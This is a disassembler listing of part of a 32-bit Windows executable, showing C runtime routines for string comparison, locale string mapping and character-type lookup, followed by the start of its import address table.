sub_429823 proc near ; CODE XREF: sub_42987E+47�p
mov eax, offset aDzc ; "¸„§C"
call sub_420364
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_4299D7
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_43A33C
call sub_40F41A
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_429823 endp
; ---------------------------------------------------------------------------
dw 0FF56h
dd 8B082474h, 0FFB1E8F1h, 6C7FFFFh, 43A354h, 0C25EC68Bh
db 4, 0
; =============== S U B R O U T I N E =======================================
sub_42987E proc near ; CODE XREF: sub_40F10C+D�p
; sub_40F16A+32�p ...
var_40 = dword ptr -40h
mov eax, offset aFzc ; "¸ä§C"
call sub_420364
sub esp, 44h
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-28h]
call sub_40F6AF
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_429712
push offset dword_43A7CC
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_43A348
call sub_420383
int 3 ; Trap to Debugger
push esi
push [esp+48h+var_40]
mov esi, ecx
call sub_429823
mov dword ptr [esi], offset off_43A348
mov eax, esi
pop esi
retn 4
sub_42987E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4298D6 proc near ; CODE XREF: sub_40ECCD+5E�p
; sub_417688+99�p ...
jmp ds:dword_42B214
sub_4298D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4298DC proc near ; CODE XREF: sub_41FEF7+24�p
; sub_420274+13�p
jmp ds:dword_42B19C
sub_4298DC endp
; =============== S U B R O U T I N E =======================================
sub_4298E2 proc near ; CODE XREF: seg000:00419C66�p
; seg000:00419C7D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_4E29A4, 0
push ebx
jnz short loc_42992C
mov edx, [esp+4+arg_4]
mov ecx, [esp+4+arg_0]
loc_4298F4: ; CODE XREF: sub_4298E2+46�j
xor ebx, ebx
mov bx, [ecx]
cmp bx, 41h
jb short loc_429908
cmp bx, 5Ah
ja short loc_429908
add ebx, 20h
loc_429908: ; CODE XREF: sub_4298E2+1B�j
; sub_4298E2+21�j
xor eax, eax
mov ax, [edx]
cmp ax, 41h
jb short loc_42991C
cmp ax, 5Ah
ja short loc_42991C
add eax, 20h
loc_42991C: ; CODE XREF: sub_4298E2+2F�j
; sub_4298E2+35�j
inc ecx
inc ecx
inc edx
inc edx
test bx, bx
jz short loc_429960
cmp bx, ax
jz short loc_4298F4
jmp short loc_429960
; ---------------------------------------------------------------------------
loc_42992C: ; CODE XREF: sub_4298E2+8�j
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_429936: ; CODE XREF: sub_4298E2+7A�j
xor eax, eax
mov ax, [esi]
push eax
call sub_429AA3
inc esi
inc esi
mov ebx, eax
xor eax, eax
mov ax, [edi]
push eax
call sub_429AA3
inc edi
pop ecx
inc edi
test bx, bx
pop ecx
jz short loc_42995E
cmp bx, ax
jz short loc_429936
loc_42995E: ; CODE XREF: sub_4298E2+75�j
pop edi
pop esi
loc_429960: ; CODE XREF: sub_4298E2+41�j
; sub_4298E2+48�j
movzx ecx, ax
movzx eax, bx
sub eax, ecx
pop ebx
retn
sub_4298E2 endp
; =============== S U B R O U T I N E =======================================
sub_42996A proc near ; CODE XREF: sub_41AB7D+21�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_429991
push esi
call sub_41E1C0
inc eax
push eax
call sub_41E5D3
test eax, eax
pop ecx
pop ecx
jz short loc_429991
push esi
push eax
call sub_41EEC0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_429991: ; CODE XREF: sub_42996A+7�j
; sub_42996A+1A�j
xor eax, eax
pop esi
retn
sub_42996A endp
; ---------------------------------------------------------------------------
db 0C7h, 1, 88h
dword_429998 dd 8B0043A3h, 0C9850449h, 0E8510774h, 0FFFF48F9h, 8B56C359h
dd 0FFE3E8F1h, 44F6FFFFh, 74010824h, 0EEE85607h, 59FFFF64h
dd 0C25EC68Bh
db 4, 0
; =============== S U B R O U T I N E =======================================
sub_4299C6 proc near ; CODE XREF: sub_429712+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_43A390
retn
sub_4299C6 endp
; =============== S U B R O U T I N E =======================================
sub_4299D7 proc near ; CODE XREF: sub_429823+16�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov dword ptr [esi], offset off_43A390
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_429A14
push dword ptr [edi+4]
call sub_41E1C0
inc eax
push eax
call sub_41E5D3
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_429A1A
push dword ptr [edi+4]
push eax
call sub_41EEC0
pop ecx
pop ecx
jmp short loc_429A1A
; ---------------------------------------------------------------------------
loc_429A14: ; CODE XREF: sub_4299D7+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_429A1A: ; CODE XREF: sub_4299D7+2E�j
; sub_4299D7+3B�j
pop edi
mov eax, esi
pop esi
retn 4
sub_4299D7 endp
; ---------------------------------------------------------------------------
db 83h, 79h, 8
dword_429A24 dd 9001C700h, 740043A3h, 471FF09h, 0FF486CE8h, 8BC359FFh
dd 0C0850441h, 98B80575h, 0C30043A3h
dword_429A44 dd 0E8F18B56h, 0FFFFFFD5h, 82444F6h, 56077401h, 0FF6454E8h
; DATA XREF: seg001:off_43A390�o
dd 0C68B59FFh, 4C25Eh
; =============== S U B R O U T I N E =======================================
sub_429A60 proc near ; CODE XREF: seg000:00411092�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp ds:dword_4E29A4, 0
jnz short loc_429A6E
jmp sub_429B30
; ---------------------------------------------------------------------------
loc_429A6E: ; CODE XREF: sub_429A60+7�j
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, [esp+0Ch+arg_4]
loc_429A79: ; CODE XREF: sub_429A60+39�j
movzx eax, byte ptr [esi]
push eax
call sub_420B27
mov ebx, eax
movzx eax, byte ptr [edi]
push eax
inc esi
call sub_420B27
pop ecx
inc edi
test ebx, ebx
pop ecx
mov ecx, eax
jz short loc_429A9B
cmp ebx, ecx
jz short loc_429A79
loc_429A9B: ; CODE XREF: sub_429A60+35�j
pop edi
mov eax, ebx
pop esi
sub eax, ecx
pop ebx
retn
sub_429A60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429AA3 proc near ; CODE XREF: sub_4298E2+5A�p
; sub_4298E2+69�p
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp ax, 0FFFFh
jnz short loc_429AB5
or ax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_429AB5: ; CODE XREF: sub_429AA3+B�j
cmp ds:dword_4E29A4, 0
jnz short loc_429AD7
cmp ax, 41h
jb short loc_429AD2
cmp ax, 5Ah
ja short loc_429AD2
movzx eax, ax
add eax, 20h
leave
retn
; ---------------------------------------------------------------------------
loc_429AD2: ; CODE XREF: sub_429AA3+1F�j
; sub_429AA3+25�j
movzx eax, ax
leave
retn
; ---------------------------------------------------------------------------
loc_429AD7: ; CODE XREF: sub_429AA3+19�j
cmp ax, 100h
jnb short loc_429AF1
push 1
push eax
call sub_429DD7
test eax, eax
pop ecx
pop ecx
jnz short loc_429AF1
mov ax, word ptr [ebp+arg_0]
leave
retn
; ---------------------------------------------------------------------------
loc_429AF1: ; CODE XREF: sub_429AA3+38�j
; sub_429AA3+46�j
push ds:dword_4E29B4
lea eax, [ebp+var_4]
push 1
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push 100h
push ds:dword_4E29A4
call sub_429B7E
add esp, 1Ch
test eax, eax
mov ax, word ptr [ebp+arg_0]
jz short locret_429B22
mov ax, [ebp+var_4]
locret_429B22: ; CODE XREF: sub_429AA3+79�j
leave
retn
sub_429AA3 endp
; ---------------------------------------------------------------------------
dd 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429B30 proc near ; CODE XREF: sub_429A60+9�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov al, 0FFh
mov edi, edi
loc_429B40: ; CODE XREF: sub_429B30+20�j
; sub_429B30+40�j
or al, al
jz short loc_429B76
mov al, [esi]
add esi, 1
mov ah, [edi]
add edi, 1
cmp ah, al
jz short loc_429B40
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
xchg ah, al
sub al, 41h
cmp al, 1Ah
sbb cl, cl
and cl, 20h
add al, cl
add al, 41h
cmp al, ah
jz short loc_429B40
sbb al, al
sbb al, 0FFh
loc_429B76: ; CODE XREF: sub_429B30+12�j
movsx eax, al
pop ebx
pop esi
pop edi
leave
retn
sub_429B30 endp
; =============== S U B R O U T I N E =======================================
sub_429B7E proc near ; CODE XREF: sub_429AA3+6B�p
push 24h
push offset dword_43A3B0
call sub_425F14
xor ebx, ebx
xor edi, edi
inc edi
cmp ds:dword_4E2B88, ebx
jnz short loc_429BCC
push ebx
push ebx
push edi
push offset dword_439C24
push 100h
push ebx
call ds:dword_42B170 ; LCMapStringW
test eax, eax
jz short loc_429BB7
mov ds:dword_4E2B88, edi
jmp short loc_429BCC
; ---------------------------------------------------------------------------
loc_429BB7: ; CODE XREF: sub_429B7E+2F�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_429BCC
mov ds:dword_4E2B88, 2
loc_429BCC: ; CODE XREF: sub_429B7E+17�j
; sub_429B7E+37�j ...
cmp [ebp+14h], ebx
jle short loc_429BEE
mov ecx, [ebp+14h]
mov eax, [ebp+10h]
loc_429BD7: ; CODE XREF: sub_429B7E+63�j
dec ecx
cmp [eax], bx
jz short loc_429BE6
inc eax
inc eax
cmp ecx, ebx
jnz short loc_429BD7
or ecx, 0FFFFFFFFh
loc_429BE6: ; CODE XREF: sub_429B7E+5D�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+14h], eax
loc_429BEE: ; CODE XREF: sub_429B7E+51�j
mov eax, ds:dword_4E2B88
cmp eax, edi
jnz short loc_429C14
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B170 ; LCMapStringW
jmp loc_429DCE
; ---------------------------------------------------------------------------
loc_429C14: ; CODE XREF: sub_429B7E+77�j
cmp eax, 2
jz short loc_429C1D
cmp eax, ebx
jnz short loc_429C71
loc_429C1D: ; CODE XREF: sub_429B7E+99�j
mov [ebp-24h], ebx
mov [ebp-2Ch], ebx
mov [ebp-28h], ebx
cmp [ebp+8], ebx
jnz short loc_429C33
mov eax, ds:dword_4E29A4
mov [ebp+8], eax
loc_429C33: ; CODE XREF: sub_429B7E+AB�j
cmp [ebp+20h], ebx
jnz short loc_429C40
mov eax, ds:dword_4E29B4
mov [ebp+20h], eax
loc_429C40: ; CODE XREF: sub_429B7E+B8�j
push dword ptr [ebp+8]
call sub_4282DB
pop ecx
cmp [ebp+20h], eax
jz short loc_429C56
cmp eax, 0FFFFFFFFh
jz short loc_429C56
mov [ebp+20h], eax
loc_429C56: ; CODE XREF: sub_429B7E+CE�j
; sub_429B7E+D3�j
push ebx
push ebx
push ebx
push ebx
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push dword ptr [ebp+20h]
call ds:dword_42B090 ; WideCharToMultiByte
mov [ebp-20h], eax
cmp eax, ebx
jnz short loc_429C78
loc_429C71: ; CODE XREF: sub_429B7E+9D�j
; sub_429B7E+141�j
xor eax, eax
jmp loc_429DCE
; ---------------------------------------------------------------------------
loc_429C78: ; CODE XREF: sub_429B7E+F1�j
mov [ebp-4], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov eax, esp
mov [ebp-1Ch], eax
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_429CAC
; ---------------------------------------------------------------------------
dd 0C340C033h, 0E8E8658Bh, 0FFFFBDD2h, 5D89DB33h, 0FC4D83E4h
dd 47FF33FFh
; ---------------------------------------------------------------------------
loc_429CAC: ; CODE XREF: sub_429B7E+114�j
cmp [ebp-1Ch], ebx
jnz short loc_429CC4
push dword ptr [ebp-20h]
call sub_41E5D3
pop ecx
mov [ebp-1Ch], eax
cmp eax, ebx
jz short loc_429C71
mov [ebp-2Ch], edi
loc_429CC4: ; CODE XREF: sub_429B7E+131�j
push ebx
push ebx
push dword ptr [ebp-20h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push ebx
push dword ptr [ebp+20h]
call ds:dword_42B090 ; WideCharToMultiByte
test eax, eax
jz loc_429DAE
push ebx
push ebx
push dword ptr [ebp-20h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B174 ; LCMapStringA
mov esi, eax
mov [ebp-30h], esi
cmp esi, ebx
jz loc_429DAE
mov [ebp-4], edi
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov edi, esp
mov [ebp-34h], edi
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_429D38
; ---------------------------------------------------------------------------
db 33h, 0C0h, 40h
dd 0E8658BC3h, 0FFBD45E8h, 33DB33FFh, 0FC4D83FFh, 0D0758BFFh
; ---------------------------------------------------------------------------
loc_429D38: ; CODE XREF: sub_429B7E+1A1�j
cmp edi, ebx
jnz short loc_429D50
push esi
call sub_41E5D3
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_429DB1
mov dword ptr [ebp-28h], 1
loc_429D50: ; CODE XREF: sub_429B7E+1BC�j
push esi
push edi
push dword ptr [ebp-20h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B174 ; LCMapStringA
test eax, eax
jz short loc_429DB1
test byte ptr [ebp+0Dh], 4
jz short loc_429D8D
mov [ebp-24h], esi
cmp [ebp+1Ch], ebx
jz short loc_429DB1
cmp [ebp+1Ch], esi
jge short loc_429D7E
mov esi, [ebp+1Ch]
loc_429D7E: ; CODE XREF: sub_429B7E+1FB�j
push esi
push edi
push dword ptr [ebp+18h]
call sub_41E860
add esp, 0Ch
jmp short loc_429DB1
; ---------------------------------------------------------------------------
loc_429D8D: ; CODE XREF: sub_429B7E+1EE�j
cmp [ebp+1Ch], ebx
jnz short loc_429D96
push ebx
push ebx
jmp short loc_429D9C
; ---------------------------------------------------------------------------
loc_429D96: ; CODE XREF: sub_429B7E+212�j
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
loc_429D9C: ; CODE XREF: sub_429B7E+216�j
push esi
push edi
push 1
push dword ptr [ebp+20h]
call ds:dword_42B07C ; MultiByteToWideChar
mov [ebp-24h], eax
jmp short loc_429DB1
; ---------------------------------------------------------------------------
loc_429DAE: ; CODE XREF: sub_429B7E+160�j
; sub_429B7E+181�j
mov edi, [ebp-34h]
loc_429DB1: ; CODE XREF: sub_429B7E+1C9�j
; sub_429B7E+1E8�j ...
cmp [ebp-28h], ebx
jz short loc_429DBD
push edi
call sub_41E2A1
pop ecx
loc_429DBD: ; CODE XREF: sub_429B7E+236�j
cmp [ebp-2Ch], ebx
jz short loc_429DCB
push dword ptr [ebp-1Ch]
call sub_41E2A1
pop ecx
loc_429DCB: ; CODE XREF: sub_429B7E+242�j
mov eax, [ebp-24h]
loc_429DCE: ; CODE XREF: sub_429B7E+91�j
; sub_429B7E+F5�j
lea esp, [ebp-40h]
call sub_425F4F
retn
sub_429B7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429DD7 proc near ; CODE XREF: sub_429AA3+3D�p
var_4 = dword ptr -4
arg_0 = word ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0FFFFh
jz short loc_429E1F
cmp [ebp+arg_0], 100h
jnb short loc_429DFB
movzx eax, [ebp+arg_0]
mov ecx, ds:off_4437DC
mov ax, [ecx+eax*2]
jmp short loc_429E26
; ---------------------------------------------------------------------------
loc_429DFB: ; CODE XREF: sub_429DD7+12�j
push ds:dword_4E29A4
lea eax, [ebp+var_4]
push ds:dword_4E29B4
push eax
push 1
lea eax, [ebp+arg_0]
push eax
push 1
call sub_429E31
add esp, 18h
test eax, eax
jnz short loc_429E23
loc_429E1F: ; CODE XREF: sub_429DD7+A�j
xor eax, eax
jmp short loc_429E26
; ---------------------------------------------------------------------------
loc_429E23: ; CODE XREF: sub_429DD7+46�j
mov eax, [ebp+var_4]
loc_429E26: ; CODE XREF: sub_429DD7+22�j
; sub_429DD7+4A�j
movzx ecx, [ebp+arg_4]
movzx eax, ax
and eax, ecx
leave
retn
sub_429DD7 endp
; =============== S U B R O U T I N E =======================================
sub_429E31 proc near ; CODE XREF: sub_429DD7+3C�p
push 24h
push offset dword_43A3C8
call sub_425F14
xor esi, esi
xor edi, edi
inc edi
cmp ds:dword_4E2B8C, esi
jnz short loc_429E7C
lea eax, [ebp-1Ch]
push eax
push edi
push offset dword_439C24
push edi
call ds:dword_42B14C ; GetStringTypeW
test eax, eax
jz short loc_429E67
mov ds:dword_4E2B8C, edi
jmp short loc_429E7C
; ---------------------------------------------------------------------------
loc_429E67: ; CODE XREF: sub_429E31+2C�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_429E7C
mov ds:dword_4E2B8C, 2
loc_429E7C: ; CODE XREF: sub_429E31+17�j
; sub_429E31+34�j ...
mov eax, ds:dword_4E2B8C
cmp eax, edi
jnz short loc_429E9C
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_42B14C ; GetStringTypeW
jmp loc_42A04D
; ---------------------------------------------------------------------------
loc_429E9C: ; CODE XREF: sub_429E31+52�j
cmp eax, 2
jz short loc_429EA5
cmp eax, esi
jnz short loc_429EF8
loc_429EA5: ; CODE XREF: sub_429E31+6E�j
mov [ebp-30h], esi
mov [ebp-2Ch], esi
cmp [ebp+1Ch], esi
jnz short loc_429EB8
mov eax, ds:dword_4E29A4
mov [ebp+1Ch], eax
loc_429EB8: ; CODE XREF: sub_429E31+7D�j
cmp [ebp+18h], esi
jnz short loc_429EC5
mov eax, ds:dword_4E29B4
mov [ebp+18h], eax
loc_429EC5: ; CODE XREF: sub_429E31+8A�j
push dword ptr [ebp+1Ch]
call sub_4282DB
pop ecx
cmp [ebp+18h], eax
jz short loc_429EDB
cmp eax, 0FFFFFFFFh
jz short loc_429EDB
mov [ebp+18h], eax
loc_429EDB: ; CODE XREF: sub_429E31+A0�j
; sub_429E31+A5�j
push esi
push esi
push esi
push esi
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push esi
push dword ptr [ebp+18h]
call ds:dword_42B090 ; WideCharToMultiByte
mov ebx, eax
mov [ebp-28h], ebx
cmp ebx, esi
jnz short loc_429EFF
loc_429EF8: ; CODE XREF: sub_429E31+72�j
; sub_429E31+126�j
xor eax, eax
jmp loc_42A04D
; ---------------------------------------------------------------------------
loc_429EFF: ; CODE XREF: sub_429E31+C5�j
mov [ebp-4], esi
mov eax, ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov eax, esp
mov [ebp-24h], eax
push ebx
push esi
push eax
call sub_41E5F0
add esp, 0Ch
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_429F44
; ---------------------------------------------------------------------------
dd 0C340C033h, 0E8E8658Bh, 0FFFFBB3Eh, 0DC6583h, 0FFFC4D83h
dd 8B47FF33h, 0F633D85Dh
; ---------------------------------------------------------------------------
loc_429F44: ; CODE XREF: sub_429E31+F5�j
cmp [ebp-24h], esi
jnz short loc_429F5C
push ebx
push edi
call sub_4205E4
pop ecx
pop ecx
mov [ebp-24h], eax
cmp eax, esi
jz short loc_429EF8
mov [ebp-30h], edi
loc_429F5C: ; CODE XREF: sub_429E31+116�j
push esi
push esi
push ebx
push dword ptr [ebp-24h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push esi
push dword ptr [ebp+18h]
call ds:dword_42B090 ; WideCharToMultiByte
test eax, eax
jz loc_42A03C
mov [ebp-4], edi
lea eax, [ebx+ebx+2]
add eax, 3
and eax, 0FFFFFFFCh
call sub_41EA20
mov [ebp-18h], esp
mov eax, esp
mov [ebp-20h], eax
or dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_429FB6
; ---------------------------------------------------------------------------
dw 0C033h
dd 658BC340h, 0BACCE8E8h, 6583FFFFh, 4D8300E0h, 0FF33FFFCh
dd 0D85D8B47h
db 33h, 0F6h
; ---------------------------------------------------------------------------
loc_429FB6: ; CODE XREF: sub_429E31+167�j
cmp [ebp-20h], esi
jnz short loc_429FD0
lea eax, [ebx+ebx+2]
push eax
call sub_41E5D3
pop ecx
mov [ebp-20h], eax
cmp eax, esi
jz short loc_42A03C
mov [ebp-2Ch], edi
loc_429FD0: ; CODE XREF: sub_429E31+188�j
cmp [ebp+1Ch], esi
jnz short loc_429FDD
mov eax, ds:dword_4E29A4
mov [ebp+1Ch], eax
loc_429FDD: ; CODE XREF: sub_429E31+1A2�j
mov edi, [ebp+10h]
add edi, edi
mov eax, [ebp-20h]
lea esi, [edi+eax]
or word ptr [esi], 0FFFFh
or word ptr [esi-2], 0FFFFh
push eax
push ebx
push dword ptr [ebp-24h]
push dword ptr [ebp+8]
push dword ptr [ebp+1Ch]
call ds:dword_42B150 ; GetStringTypeA
mov [ebp-34h], eax
cmp word ptr [esi-2], 0FFFFh
jz short loc_42A027
cmp word ptr [esi], 0FFFFh
jnz short loc_42A027
push edi
push dword ptr [ebp-20h]
push dword ptr [ebp+14h]
call sub_41F980
add esp, 0Ch
jmp short loc_42A02B
; ---------------------------------------------------------------------------
loc_42A027: ; CODE XREF: sub_429E31+1DC�j
; sub_429E31+1E3�j
and dword ptr [ebp-34h], 0
loc_42A02B: ; CODE XREF: sub_429E31+1F4�j
cmp dword ptr [ebp-2Ch], 0
jz short loc_42A03A
push dword ptr [ebp-20h]
call sub_41E2A1
pop ecx
loc_42A03A: ; CODE XREF: sub_429E31+1FE�j
xor esi, esi
loc_42A03C: ; CODE XREF: sub_429E31+143�j
; sub_429E31+19A�j
cmp [ebp-30h], esi
jz short loc_42A04A
push dword ptr [ebp-24h]
call sub_41E2A1
pop ecx
loc_42A04A: ; CODE XREF: sub_429E31+20E�j
mov eax, [ebp-34h]
loc_42A04D: ; CODE XREF: sub_429E31+66�j
; sub_429E31+C9�j
lea esp, [ebp-40h]
call sub_425F4F
retn
sub_429E31 endp
; ---------------------------------------------------------------------------
a0jc db '¸0¦C',0 ; DATA XREF: sub_40F024�o
db 0E9h
dd 0FFFF5EE9h, 0E9C84D8Dh, 0FFFE4FB2h
aTjc db '¸T¦C',0 ; DATA XREF: sub_40F47A�o
db 0E9h, 0D7h, 5Eh
dword_42A070 dd 4D8DFFFFh, 4FA0E914h, 4D8DFFFEh, 4F98E9D8h ; DATA XREF: seg001:0043A67C�o
db 0FEh, 0FFh
aAjc db '¸€¦C',0 ; DATA XREF: sub_40F5F6�o
db 0E9h
dd 0FFFF5EBDh, 4E1F08A1h, 0FEE08300h, 4E1F08A3h
db 0, 0C3h
aDjc db '¸¤¦C',0 ; DATA XREF: sub_41B802�o
db 0E9h
dd 0FFFF5EA5h, 0E9F04D8Bh, 0FFFFF975h
aDzc db '¸„§C',0 ; DATA XREF: sub_429712�o sub_429823�o
db 0E9h, 93h, 5Eh
dd 4D8DFFFFh, 4F5CE9D8h
db 0FEh, 0FFh
aFzc db '¸ä§C',0 ; DATA XREF: sub_4297E3�o sub_42987E�o
db 0E9h
dword_42A0C4 dd 0FFFF5E81h, 0FFFF68h, 5396800h, 4EE80000h, 59FFFF12h
; DATA XREF: seg002:0043C008�o
dd 1FE4A359h, 68C3004Dh, 0FFFEh, 40068h, 1237E800h, 5959FFFFh
dd 4D525CA3h, 0C300h, 3C2h dup(0)
seg000 ends
; Section 2. (virtual address 0002B000)
; Virtual size : 00011000 ( 69632.)
; Section size in file : 00011000 ( 69632.)
; Offset to raw data for section: 0002B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
seg001 segment para public 'DATA' use32
assume cs:seg001
;org 42B000h
dword_42B000 dd 77E75CB5h ; DATA XREF: seg000:004011EE�r
; sub_40274D+2D16�r ...
dword_42B004 dd 77E77963h ; DATA XREF: seg000:004011C7�r
; sub_40A263+2C5�r ...
dword_42B008 dd 77E61BB8h ; DATA XREF: seg000:004011B6�r
; sub_40274D+6651�r ...
dword_42B00C dd 77E7A099h ; DATA XREF: seg000:00401192�r
; sub_40274D+1E67�r ...
dword_42B010 dd 77E704FCh ; DATA XREF: seg000:00401183�r
; sub_40274D+1FAD�r ...
dword_42B014 dd 77E61BE6h ; DATA XREF: seg000:00401138�r
; sub_40123B+93�r ...
dword_42B018 dd 77E805D8h ; DATA XREF: sub_4012D6+13A�r
; sub_4012D6:loc_4017E4�r ...
dword_42B01C dd 77F5157Dh ; DATA XREF: sub_4012D6:loc_4013F6�r
; sub_4012D6:loc_401520�r ...
dword_42B020 dd 77E7A5FDh ; DATA XREF: sub_4012D6+11�r
; sub_41B24B+4D�r ...
dword_42B024 dd 77E79F93h ; DATA XREF: sub_4012D6+2�r
; sub_40A263+CF�r ...
dword_42B028 dd 77E75CEBh ; DATA XREF: sub_40274D+7721�r
; sub_40AF6E+27�r ...
dword_42B02C dd 77E73628h ; DATA XREF: sub_40274D+7493�r
; sub_40A263+325�r ...
dword_42B030 dd 77E6AD34h ; DATA XREF: sub_40274D+6697�r
; sub_41AEDD+35�r
dword_42B034 dd 77E71AFEh ; DATA XREF: sub_40274D+6484�r
dword_42B038 dd 77E7751Ah ; DATA XREF: sub_40274D+236D�r
; sub_40274D+2F80�r ...
dword_42B03C dd 77E7AC37h ; DATA XREF: sub_40274D+705�r
; sub_40274D+93B�r ...
dword_42B040 dd 77E706B7h ; DATA XREF: sub_40A263+25E�r
; seg000:00419BA1�r ...
dword_42B044 dd 77E80656h ; DATA XREF: sub_40A263+251�r
; seg000:00426F81�r
dword_42B048 dd 77E6BD13h ; DATA XREF: sub_40A263:loc_40A417�r
; sub_40FDC3+E1�r ...
dword_42B04C dd 77E70396h ; DATA XREF: sub_40A263+1AE�r
; sub_40A263+20B�r ...
dword_42B050 dd 77E74CABh ; DATA XREF: sub_40A263+197�r
; seg000:00412C39�r ...
dword_42B054 dd 77E79D5Bh ; DATA XREF: sub_40A263+6B�r
; sub_40A263+2FB�r ...
dword_42B058 dd 77E7C2C4h ; DATA XREF: sub_40A263+64�r
dword_42B05C dd 77E65F4Ch ; DATA XREF: seg000:0040A93B�r
; sub_41BE8A+34�r
dword_42B060 dd 77E7513Ch ; DATA XREF: seg000:0040A9A8�r
; sub_4282DB+20�r
dword_42B064 dd 77E7C657h ; DATA XREF: sub_41B065+32�r
; sub_41B24B+16�r ...
dword_42B068 dd 77E73C49h ; DATA XREF: seg000:004133D1�r
; seg000:0041347C�r ...
dd 77F7E300h, 77F7E21Fh, 77E7C706h, 77F53275h
dword_42B07C dd 77E77CCEh ; DATA XREF: sub_40C89B+61�r
; sub_40C979+61�r ...
dword_42B080 dd 77E78B82h ; DATA XREF: seg000:0040CD7C�r
; seg000:0041152F�r ...
dword_42B084 dd 77E79D8Ch ; DATA XREF: seg000:0040CD47�r
; seg000:0041063F�r ...
dword_42B088 dd 77E73EACh ; DATA XREF: seg000:0040CD2D�r
; seg000:00410623�r
dword_42B08C dd 77E7A837h ; DATA XREF: seg000:0040CCAF�r
; seg000:004105EB�r ...
dword_42B090 dd 77E79924h ; DATA XREF: sub_40F87A+A9�r
; seg000:004101BE�r ...
dword_42B094 dd 77E616B4h ; DATA XREF: seg000:004116ED�r
; seg000:0041416F�r ...
dword_42B098 dd 77E79CE3h ; DATA XREF: seg000:00411666�r
; sub_413CD4+73�r ...
dword_42B09C dd 77E79C90h ; DATA XREF: seg000:00411652�r
; seg000:0041165F�r ...
dword_42B0A0 dd 77E7727Ah ; DATA XREF: seg000:004115C9�r
; sub_413F5A+48�r ...
dword_42B0A4 dd 77E78EAAh ; DATA XREF: sub_412135+5ED�r
; sub_419799+C0�r ...
dword_42B0A8 dd 77E79424h ; DATA XREF: sub_412135+27A�r
; seg000:00419CB9�r
dword_42B0AC dd 77E794BFh ; DATA XREF: sub_412135+26C�r
; seg000:00419CA7�r
dword_42B0B0 dd 77E75E67h ; DATA XREF: sub_412135+20C�r
; sub_412135+5DC�r ...
dword_42B0B4 dd 77E75D9Eh ; DATA XREF: sub_412135+1FB�r
; sub_419799+26�r
dword_42B0B8 dd 77E78C81h ; DATA XREF: seg000:00412822�r
; sub_42569D+43�r ...
dword_42B0BC dd 77E793EFh ; DATA XREF: seg000:004127EE�r
; seg000:00412D17�r
dword_42B0C0 dd 77E64106h ; DATA XREF: sub_41D779+185�r
